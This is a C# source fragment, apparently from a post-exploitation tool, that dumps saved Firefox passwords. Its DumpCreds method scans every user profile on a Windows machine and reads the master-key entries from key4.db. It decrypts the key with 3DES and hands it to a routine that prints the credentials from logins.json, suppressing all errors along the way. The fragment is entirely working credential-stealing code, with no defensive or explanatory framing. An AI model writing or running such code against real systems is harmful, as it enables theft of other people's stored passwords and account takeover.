public static Dictionary <string, string> decodeLoginData(byte[] data) { var kvpList = new Dictionary <string, string>(); var base64Decoded = Convert.FromBase64String(Encoding.UTF8.GetString(data)); var asn = new Cryptography.Asn1Der(); var parsedData = asn.Parse(base64Decoded); //Console.WriteLine(parsedData); /* * SEQUENCE { * SEQUENCE { * OCTETSTRING F8000000000000000000000000000001 * OBJECTIDENTIFIER 2A864886F70D0307 * OCTETSTRING 34E18A54D558AB3E <------- iv * OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F <------- ciphertext * OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F * } * } * */ var tokens = parsedData.ToString().Split(new[] { "OCTETSTRING" }, StringSplitOptions.None); var saltString = tokens[2].Split('\r').Select(p => p.Trim()).ToList(); var cipherString = tokens[3].Split('\r').Select(p => p.Trim()).ToList(); kvpList.Add(saltString[0], cipherString[0]); return(kvpList); }
public static void DumpCreds() { var dirPath = "C:\\Users"; string loginjson; byte[] key = null; var dirs = new List <string>(Directory.EnumerateDirectories(dirPath)); try { foreach (var dir in dirs) { var Path = dir + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"; if (!Directory.Exists(Path)) { continue; } var ProfilePath = Directory.GetDirectories(Path, "*.default"); var KeyPath = ProfilePath[0] + "\\key4.db"; loginjson = ProfilePath[0] + "\\logins.json"; var m_dbConnection = new SQLiteConnection("Data Source=" + KeyPath + ";Version=3;"); m_dbConnection.Open(); string sql = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; byte[] global_salt = null; byte[] item2 = null; using (var cmd = new SQLiteCommand(sql, m_dbConnection)) { using (var rdr = cmd.ExecuteReader()) { while (rdr.Read()) { global_salt = (byte[])rdr.GetValue(0); item2 = (byte[])rdr.GetValue(1); } } } var asn = new Cryptography.Asn1Der(); var parsedData = asn.Parse(item2); //Console.WriteLine(parsedData); //Asn1.AsnElt asn_AS_REP = Asn1.AsnElt.Decode(item2, false); byte[] entry_salt_byte = new byte[20]; byte[] cipher_text_byte = new byte[16]; byte[] cipher_text_byte_new = new byte[32]; // This is very bad hack! If you want to do it properly, read from the parsed ASN1 data!! Array.Copy(item2, 21, entry_salt_byte, 0, 20); Array.Copy(item2, 46, cipher_text_byte, 0, 16); //Console.WriteLine(ByteArrayToString(entry_salt_byte)); //Console.WriteLine(ByteArrayToString(cipher_text_byte)); var clearText = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte); var clearString = Encoding.ASCII.GetString(clearText); //Console.WriteLine(ByteArrayToString(clearText)); //Console.WriteLine(); byte[] a11 = null; byte[] a102 = null; if (clearString == "password-check\u0002\u0002") { var query = "SELECT a11,a102 FROM nssPrivate;"; using (var cmd = new SQLiteCommand(query, m_dbConnection)) { using (var rdr = cmd.ExecuteReader()) { while (rdr.Read()) { a11 = (byte[])rdr.GetValue(0); a102 = (byte[])rdr.GetValue(1); } } } Array.Copy(a11, 21, entry_salt_byte, 0, 20); Array.Copy(a11, 46, cipher_text_byte_new, 0, 32); //Console.WriteLine(ByteArrayToString(entry_salt_byte)); //Console.WriteLine(ByteArrayToString(cipher_text_byte_new)); var keyBytes = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte_new); //Console.WriteLine("Key: " + ByteArrayToString(keyBytes)); //var keyBytes = StringToByteArray(ConvertStringToHex(mainKey)); key = new byte[24]; Array.Copy(keyBytes, key, 24); } m_dbConnection.Close(); printCreds(key, loginjson); } } catch { } }